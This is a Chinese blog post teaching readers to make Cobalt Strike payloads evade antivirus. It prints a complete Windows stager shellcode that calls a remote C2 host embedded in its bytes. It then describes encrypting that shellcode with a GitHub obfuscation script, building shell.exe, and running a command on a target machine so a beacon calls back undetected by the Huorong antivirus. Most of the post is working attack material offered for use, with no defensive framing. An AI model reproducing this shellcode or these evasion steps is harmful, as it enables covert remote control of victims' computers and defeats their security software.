【远控使用】Cobalt Strike免杀payload

前言

  • Cobalt Strike的基础使用

Shellcode混淆免杀

在github逛了一波,找到一个8月20多号的shellcode混淆脚本,不知道什么时候会失效,先记录一下使用方法

预备:python3.x,安装依赖的话就用pip就行

下载地址:https://github.com/iframepm/FuckAV

1、下载好之后,解压

2、CS生成一个python的shellcode,注意要64位的payload

3、接着将其保存起来payload.py,打开之后复制其中的这部分内容

1
\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x70\x33\x4b\x6f\x00\x37\x99\x6d\x09\xe7\x2a\x7d\xfc\x81\x4b\xc6\x64\x31\x32\x4b\x06\x2d\x5c\x81\x42\x58\xc3\x9f\x06\xc4\x29\x85\xe9\x94\xbc\xf2\x73\x28\x49\xef\x8e\x40\x5f\x7c\xce\x1a\x42\x53\xaf\xf2\x97\xb4\x58\x65\xa2\x7e\x51\xc5\x8a\xf4\xc8\x16\xe7\x0e\x9a\x99\xf8\xad\x85\xce\xf6\x35\x7f\xca\x6a\xe1\xc8\x16\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x32\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x32\x2e\x30\x2e\x35\x30\x37\x32\x37\x29\x0d\x0a\x00\x0d\x5b\x89\xf5\x8d\x86\xb8\xc8\x45\x9f\x25\xa1\xc0\xe6\x83\x7d\x23\x5c\x1d\x85\xa7\x12\x21\x41\xf2\x6c\xb5\xd9\x8c\x60\x8e\x9c\x33\x51\xb9\x5d\xd3\xfe\x72\x3a\xd7\x11\xab\x4c\xc4\x07\x4e\x82\xaa\x6c\xf1\x1f\x34\x29\xb6\x03\xf3\x93\xda\x04\x0e\x41\x0d\xb6\x5d\x18\x39\xb7\x2f\xaf\xa0\xb0\x9e\x90\x64\x06\x1a\x61\x43\x7f\xbe\x52\x69\x79\xc2\x92\xca\x4d\xfb\x68\x32\x01\x78\xc7\xce\x0e\x73\x71\x03\xb3\x92\xfd\xc2\x34\x4d\xbe\x25\x0e\x05\xc8\xea\x86\xcb\x7a\x44\x86\x67\x57\x1d\xbb\xc4\x65\x7e\x30\x42\x16\x9b\x12\xd4\xaf\xcc\x8c\xa9\x0d\x3a\x25\x84\xf6\x00\x3e\xb6\xa4\xfa\x07\x44\xc1\xc2\xd4\x68\xe7\xc6\xc2\x35\x93\x8f\x3e\xe2\x10\x44\x10\xba\x6b\xe6\xf1\x13\xce\xe7\xf0\x2f\x2d\x07\x9c\x9f\x25\x49\x2b\x54\x35\x49\xee\x4f\x4f\x45\x29\x48\x12\xd6\x7b\x3f\xe4\x89\xa8\x4a\xfa\xc6\x22\x4e\xaf\x36\x89\x14\x72\x45\xd3\x03\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x61\x64\x33\x39\x34\x30\x32\x33\x34\x35\x2e\x77\x69\x63\x70\x2e\x76\x69\x70\x00\x6f\xaa\x51\xc3

4、运行shellcode混淆工具来加密绕过AV

1
python3 FuckAV.py

5、输入1,然后填入我们刚刚复制的shellcode,进行6次加密

image-20210912132310395

接着我们得到回馈,shellcode在当前目录的hex.txt中

image-20210912132347782

6、将其复制到我们的服务器中,看看是否可以打开,发现可以了

image-20210912132609809

7、接着我们再生成一个shell.exe文件,在目标机子上用这个shell.exe文件执行我们刚刚加密的shellcode文本也就是hex.txt文本,就可以达到绕过AV

①再次执行刚刚的代码,然后选择2,生成一个shell.exe文件

image-20210912133102134

②在目标机子上通过这个命令来反弹beacon到cs中,发现火绒没有杀掉,也扫不到

1
shell http://127.0.0.1/hex.txt

image-20210912133253832

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】Cobalt Strike免杀payload

文章作者:孤桜懶契

发布时间:2021年09月11日 - 09:52:49

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/139.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------